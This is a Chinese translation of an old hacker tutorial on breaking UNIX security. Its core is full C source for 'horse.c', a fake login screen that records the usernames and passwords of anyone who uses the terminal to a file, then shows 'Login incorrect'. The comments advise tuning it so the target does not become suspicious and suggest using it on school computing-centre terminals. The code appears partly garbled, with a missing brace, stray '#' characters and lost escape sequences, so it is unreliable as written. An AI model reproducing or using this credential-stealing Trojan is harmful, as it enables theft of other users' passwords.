Martin 翻译
序言
----------
"UNIX 安全" 是一种矛盾修饰法.它是一种能被暴力攻击法轻易攻破
的系统.(大多数UNIX系统不会因为多次错误的登录而挂起,而且它还有许多缺省的登录名如root,bin,sys,uccp等.)一旦你登录到系统,你就能轻易降服它,如果你会一点C语言,你就能让系统为你工作,并能完全避开系统的安全障碍建立你自己的登录,阅读任何人的文档,等.
本文将提供一些这方面的C的源码以供大家实践.
配置要求
你需要一个UNIX系统的有效帐号.为获得最好效果,最好使用工作在真正机子(一台PDP/11,VAX,Pyramid,等)上的完全的UNIX版本(如 4.2bsd or AT&T System V).如果你能在学校的系统中获得一个帐号那是再好不过了.
注意
本文受到86年4月的 issue of BYTE 中的一篇名叫"Making UNIX Secure."文章的启发而写的.在那篇文章中作者称"我们希望所提供的资料是有趣的但又不会成为'破坏者的菜谱'.我们常有意删除一些细节" 我根据此文的总体纲要,给出了基于他们所提到的方法的例子.
步骤一:获得口令
你所需要的技巧仅仅是一些最基本的UNIX及C语言的常识.不过,你得有能使用的终端如学校里计算中心里的.
当你向一个典型的UNIX系统登录时,你能看到如下这些:
Tiburon Systems 4.2bsd / System V (shark)
login: shark
Password: (并不显示)
我提供的程序能模拟一个登录过程.你在终端上运行这程序,然后离开.那些不知情的家伙如果来登录,他们的登录信息就会被保存成文档,并且屏幕上会显示"login incorrect"
那些家伙会被要求再登录一次.第二次是真正的登录,这时候他们都成功了.显然那些家伙并不聪明.
在系统上将下列源码生成文件'horse.c'. 因为系统有不同的版本,你可能需要修改前8行.
----- Code Begins Here -----
/* this is what a 'C' comment looks like. You can leave them out. */
/* #define's are like macros you can use for configuration. */
#define SYSTEM " Tiburon Systems 4.2bsd UNIX (shark) "
/* The above string should be made to look like the message that your
* system prints when ready. Each represents a carriage return.
*/
#define LOGIN "login: "
/* The above is the login prompt. You shouldn't have to change it
* unless you're running some strange version of UNIX.
*/
#define PASSWORD "password:"
/* The above is the password prompt. You shouldn't have to change
* it, either.
*/
#define WAIT 2
/* The numerical value assigned to WAIT is the delay you get after
* "password:" and before "login incorrect." Change it (0 = almost
* no delay, 5 = LONG delay) so it looks like your system's delay.
* realism is the key here - we don't want our target to become
* suspicious.
*/
#define INCORRECT "Login incorrect. "
/* Change the above so it is what your system says when an incorrect
* login is given. You shouldn't have to change it.
*/
#define FILENAME "stuff"
/* FILENAME is the name of the file that the hacked passwords will
* be put into automatically. 'stuff' is a perfectly good name.
*/
/* Don't change the rest of the program unless there is a need to
* and you know 'C'.
*/
#include <curses.h>
#include <signal.h>
int stop();
main()
{char name[10], password[10];
int i;
FILE *fp, *fopen();
signal(SIGINT,stop);
initscr();
printf(SYSTEM);
printf(LOGIN);
scanf("%[^ ]",name);
getchar();
noecho();
printf(PASSWORD);
scanf("%[^ ]",password);
printf(" ");
getchar();
echo();
sleep(WAIT);
if ( ( fp = fopen(FILENAME,"a") ) != NULL ) {
#fprintf(fp,"login %s has password %s ",name,password);
#fclose(fp);
#}
printf(INCORRECT);
endwin();
stop()
{
endwin();
exit(0);
}
----- Source Ends Here -----
